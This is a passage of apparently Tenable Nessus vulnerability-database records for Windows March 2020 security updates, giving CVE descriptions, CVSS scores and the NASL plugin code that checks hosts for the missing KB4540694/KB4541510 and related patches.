exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540688, 4541500])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-06-16T15:28:15", "description": "The remote Windows host is missing security update 4540694 or cumulative update 4541510. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. 
An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. 
(CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. 
(CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. 
An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540694: Windows Server 2012 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0799", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0814", "CVE-2020-0819", "CVE-2020-0822", "CVE-2020-0824", "CVE-2020-0830", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887"], "modified": "2022-01-31T00:00:00", "cpe": 
["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4541510.NASL", "href": "https://www.tenable.com/plugins/nessus/134375", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134375);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0799\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0814\",\n \"CVE-2020-0819\",\n \"CVE-2020-0822\",\n \"CVE-2020-0824\",\n \"CVE-2020-0830\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\"\n );\n script_xref(name:\"MSKB\", value:\"4541510\");\n script_xref(name:\"MSKB\", value:\"4540694\");\n script_xref(name:\"MSFT\", value:\"MS20-4541510\");\n script_xref(name:\"MSFT\", value:\"MS20-4540694\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540694: Windows Server 2012 March 
2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540694\nor cumulative update 4541510. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. 
An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. 
The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. 
(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\");\n # https://support.microsoft.com/en-us/help/4541510/windows-server-2012-update-kb4541510\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?438d05ee\");\n # https://support.microsoft.com/en-us/help/4540694/windows-server-2012-update-kb4540694\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?224a0292\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4540694 or Cumulative Update KB4541510.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540694', '4541510');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540694, 4541510])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:27:53", "description": "The remote Windows host is missing security update 4541505 or cumulative update 4541509. 
It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. 
(CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0849)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. 
